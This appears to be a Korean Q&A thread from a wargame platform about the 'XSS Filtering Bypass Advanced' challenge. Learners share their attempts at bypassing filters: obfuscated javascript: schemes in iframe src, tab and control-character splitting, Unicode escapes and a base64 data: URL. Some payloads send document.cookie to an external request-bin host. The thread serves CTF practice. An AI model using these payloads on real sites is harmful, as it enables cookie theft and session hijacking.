XSS Filtering Bypass Advanced

on이나 script만 우회하면 될것 같은데 아무리 찾아봐도 잘 모르겠네용... 힌트 좀 주시면 감사하겠습니다

강의에서 본 <iframe src="\1\4jAVasC\triPT:alert(document.domain)">처럼 사용을 해보았으나 안됩니다.. script나 on 키워드를 우회하려면 어느 부분을 공부해 봐야 할까요? location이나 document는 javascript 스키마를 이용해서 했는데 중요한 script나 on 우회 방법을 모르겠습니다.

iframe 태그를 사용해서 javascript: 이런 형태로 필터링 단어는 정규화과정을 통해 우회하였습니다. 이후 memo=document.cookie의 값을 입력하여 전송했을때 제 테스트 쿠키로 vuln에서 테스트 할경우에는 쿠키값이 출력되는데 flag를 통해서 전송했을때는 왜 안보일까요..?

iframe src="javascript" 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요, iframe src="javascri%09pt:locatio%09n.href=%27구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고 flag 페이지에선 아무것도 전송되지 않습니다... <iframe srcdoc 로는 javascript: 구문이 안먹는것같고,, 어떻게 우회해야될지 모르겟네요 ㅠㅠ

<embed src="data:text/html; base64 ... 를 이용해 문제를 해결하는 중인데 상위 페이지의 cookie값을 가져오지 못하고 있습니다. 제가 문제 방향을 이상하게 잡은건가요 ? 또 다른 방법이 있을까요..

vuln 페이지 쿼리에 document.cookie를 보냈는데 memo에 PHPSESSID=random 이런식으로 세션 아이디가 그대로 찍히네요 드림핵 툴즈를 사용해서 푸는 방법 말고, memo에서도 풀어보고 싶습니다 제 방법이 잘못 된걸까요???

javascript: 스키마를 사용하려 했는데 여기서 javascript는 Unicode escape sequence로 우회하면 안되는 건가요?

<iframe src=“javascri pt:locatio n.href=‘https://XXXXX.request.dreamhack.games/?memo=’+d ocument.cookie”> <iframe src=“javascri` pt:locatio n.href=‘/memo?memo=’+d ocument.cookie”> 이런식으로 bypass를 했는데 filtered!!!가 안뜨긴 하는데 계속 ` Not Found The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. ` 가 계속 나옵니다... 왜 이러는지 알려 주실 수 있나요..?

URL에 제어문자 \t와 같은 걸 넣으면 '\', 't' 문자 그대로 들어가서 제어문자로 인식을 안하고 문자로서 인식을 한다고 하던데 왜 그런지 이해할만한 이유가 있나요... 납득이 가면 공부에 더 도움이 될 거 같아 질문합니다!

Unicode escape sequence 사용 시 이를 통해 우회 시, Unicode escape sequence 해석을 위해 javascript: 선언 선행이 필수인가요? 예를 들면 꼭 <a href="javascript:, <iframe src:"javascript: 처럼 javascript:로 시작해야하는지요. <img> 태그 등에서 javascript: 없이 onerror=locati\u006fn.href... 이런식으로는 동작 안하더라고요. 혹은 img 태그 등에서도 javascript 없이 Unicode escape sequence를 사용하는 법이 있거나 할까요? (아니면 img 태그에서도 javascript: 선언이 가능한가요?) javasciprt: 선언 우회 시 정규화 사용에 대해 javascript: 를 정규화 하면 \1\4jAVasC\triPT: 처럼 사용을 하는데요. 이 때, 실제 form 등에서는 \1, \4, \t를 실제 입력 값으로 바꿔서 넣어줘야 하더라고요. ex. \t는 실제 탭을 입력해야 함 (
javascr ipt: 처럼) 이를 python에서 보낼때는 어떻게 보낼 수 있나요? (curl도 궁금하고요..) 그리고, print("\1\4\t") 해봐도 \1\4는 결과값에 나오지가 않던데..
 이 부분은 어떻게 쉽게 얻을 수 있을까요? (인터넷이 검색이 아닌 쉘 등에서 얻어보려면..) 관련하여 설명을 해주시면 감사하겠습니다.